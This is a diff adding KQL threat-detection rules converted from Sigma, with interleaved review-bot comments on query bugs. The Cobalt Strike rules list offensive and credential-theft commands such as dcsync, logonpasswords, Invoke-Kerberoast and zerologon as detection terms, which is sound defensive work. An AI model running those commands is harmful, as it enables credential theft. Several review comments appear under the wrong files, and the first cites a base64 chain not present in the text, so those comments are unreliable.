+++ b/KQL/rules/Execution/new_application_in_appcompat.kql
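Review bot: Every fragment in the long OR chain that starts at the `| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg"` line is a base64 slice of UTF-16LE text, and base64 is case-sensitive, but KQL `contains` is case-insensitive, so each term also matches case-folded look-alikes that decode to different bytes, and case-insensitive substring operators are the slowest form the engine offers. Replace `contains` with `contains_cs` throughout the chain; the change is mechanical and keeps the term list intact. The description's example `nEt.WEbCliEnT` also cannot be caught by this rule in plaintext form, since case-insensitive operators cannot see a casing anomaly at all; if plaintext coverage is wanted it needs a separate case-sensitive clause such as `ProcessCommandLine matches regex @"(?i)net\.webclient" and not(ProcessCommandLine contains_cs "Net.WebClient")`, and the header should say the current rule only covers the encoded-command form.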
@@ -0,0 +1,14 @@
+// Title: New Application in AppCompat
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: informational
+// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - This rule is to explore new applications on an endpoint. False positives depends on the organization.
+// - Newly setup system.
+// - Legitimate installation of new application.
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..d3ce7551
--- /dev/null
+++ b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: New Process Created Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects new process creation using WMIC via the "process call create" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
new file mode 100644
index 00000000..48a354d5
--- /dev/null
+++ b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
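Review bot: The predicate `RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"` can never match, because KQL `endswith` has no wildcard support and compares the literal `*`; the Sigma wildcard survived the conversion untranslated, so this rule is silently dead. The per-application entries are written as values under the Store key, so the intended form is presumably `| where ActionType == "RegistryValueSet" and RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store"`, with RegistryValueName carrying the executable path; confirm against a live event before shipping. The conversion script should reject or flag any `*` remaining inside a `startswith`/`endswith`/`=~` literal, since the same bug will affect other converted rules.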
@@ -0,0 +1,12 @@
+// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage by an administrator
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
new file mode 100644
index 00000000..b31ae7fb
--- /dev/null
+++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
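Review bot: The image check joins the path and the PE original name with `and`, so a renamed copy of the binary (the case the OriginalFileName check exists to catch) does not match, and neither does a row where the version-info field is empty; the sibling rules on this page (`wmic.exe`, `MMC.exe`) use `or` for the same pair, and this one should too: `(FolderPath endswith "\\tpmvscmgr.exe" or ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")`. `ProcessCommandLine contains "create"` also matches the word anywhere on the line, including inside paths; `ProcessCommandLine has "create"` would bind to the whole token. The inconsistency suggests the converter handles Sigma list-of-maps selections differently from the other rules, which is worth checking there rather than patching one file.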
@@ -0,0 +1,16 @@
+// Title: NodeJS Execution of JavaScript File
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: low
+// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
+Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
+Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
+Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/Execution/nohup_execution.kql
new file mode 100644
index 00000000..a579be68
--- /dev/null
+++ b/KQL/rules/Execution/nohup_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nohup Execution
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-06
+// Level: medium
+// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Administrators or installed processes that leverage nohup
+
+DeviceProcessEvents
+| where FolderPath endswith "/nohup"
\ No newline at end of file
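Review bot: Lines 6–8 of the nodejs hunk (`+Node.js is a popular …`, `+Adversaries have been observed …`, `+Because Node.js is commonly used …`) are the continuation lines of a multi-line Sigma description emitted without the `//` prefix, so the generated file contains bare prose and the query will not parse when run in Advanced Hunting. The converter should prefix every line of the description, producing `// Node.js is a popular open-source JavaScript runtime …` and so on for each continuation line. The same defect appears in the Office network-connection, Microsoft Dialer, Cmdl32 and Sysinternals-impersonation hunks later in this diff.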
diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
new file mode 100644
index 00000000..cad06e5b
--- /dev/null
+++ b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
@@ -0,0 +1,12 @@
+// Title: Non Interactive PowerShell Process Spawned
+// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
+// Date: 2019-09-12
+// Level: low
+// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
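Review bot: The exclusion `InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"` can never be true: `=~` is whole-string case-insensitive equality and a real path begins with a drive letter, so the leading `:\` (which, judging by the neighbouring `endswith ":\\Windows\\explorer.exe"` terms, is the converter's rendering of a drive-letter wildcard) leaves this filter dead and PowerShell spawned by SetupHost keeps alerting. Change it to `InitiatingProcessFolderPath endswith ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"` so it matches the other three terms in that `not(...)` group. The converter should be checked for other `=~` comparisons against strings that start with `:\\`, since any such filter is equally inert.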
diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
new file mode 100644
index 00000000..ae80ce24
--- /dev/null
+++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
@@ -0,0 +1,17 @@
+// Title: Office Application Initiated Network Connection To Non-Local IP
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-10
+// Level: medium
+// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
+This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
+This rule will require an initial baseline and tuning that is specific to your organization.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
+// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.
+// - It is highly recommended to baseline your activity and tune out common business use cases.
+ +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, 
"2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or 
ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, 
"2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or 
ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp")))) \ No newline at end of file diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql new file mode 100644 index 00000000..81433cb7 --- /dev/null +++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql 
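Review bot: In the Office network-connection hunk every IPv6 exclusion (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"` and all the `2603:…`, `2620:…` and `2a01:…` prefixes) is passed to `ipv4_is_in_range`, which only evaluates IPv4 addresses and yields null for anything else, so none of those exclusions can ever fire and any IPv6 connection from Office to the listed Microsoft ranges will alert; those entries need `ipv6_is_in_range(RemoteIP, …)` instead. Separately, `RemotePort in~ ("80", "443")` (and the `"143", "587", "993", "995"` group) compares an integer column against string literals — the same clause correctly writes `RemotePort == 443` unquoted — which Kusto should reject as a type mismatch, taking the whole rule down; use `RemotePort in (80, 443)` and `RemotePort in (143, 587, 993, 995)`. The Microsoft Dialer hunk has the same `ipv4_is_in_range` on IPv6 prefixes in its private-address exclusion.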
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Commands
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, stp.1u
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
new file mode 100644
index 00000000..0a14b55a
--- /dev/null
+++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Modules
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
new file mode 100644
index 00000000..71ff2c4b
--- /dev/null
+++ b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
@@ -0,0 +1,10 @@
+// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript
+// Author: Sohan G (D4rkCiph3r), Red Canary (Idea)
+// Date: 2023-04-03
+// Level: medium
+// Description: Detects potential suspicious applet or osascript executing "osacompile".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript")
\ No newline at end of file
diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/Execution/osacompile_run_only_execution.kql
new file mode 100644
index 00000000..0f2d1440
--- /dev/null
+++ b/KQL/rules/Execution/osacompile_run_only_execution.kql
@@ -0,0 +1,10 @@
+// Title: OSACompile Run-Only Execution
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects potential suspicious run-only executions compiled using OSACompile
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e "
\ No newline at end of file
diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
new file mode 100644
index 00000000..5676d2ab
--- /dev/null
+++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
@@ -0,0 +1,15 @@
+// Title: Outbound Network Connection Initiated By Microsoft Dialer
+// Author: CertainlyP
+// Date: 2024-04-26
+// Level: high
+// Description: Detects outbound network connection initiated by Microsoft Dialer.
+The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
+This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1071.001
+// False Positives:
+// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
new file mode 100644
index 00000000..4bb6b241
--- /dev/null
+++ b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
@@ -0,0 +1,10 @@
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
new file mode 100644
index 00000000..46ec6a4e
--- /dev/null
+++ b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
@@ -0,0 +1,10 @@
+// Title: Payload Decoded and Decrypted via Built-in Utilities
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/Execution/pcre_net_package_image_load.kql
new file mode 100644
index 00000000..7305c0fd
--- /dev/null
+++ b/KQL/rules/Execution/pcre_net_package_image_load.kql
@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Image Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes loading modules related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/Execution/pcre_net_package_temp_files.kql
new file mode 100644
index 00000000..8c7e4bf5
--- /dev/null
+++ b/KQL/rules/Execution/pcre_net_package_temp_files.kql
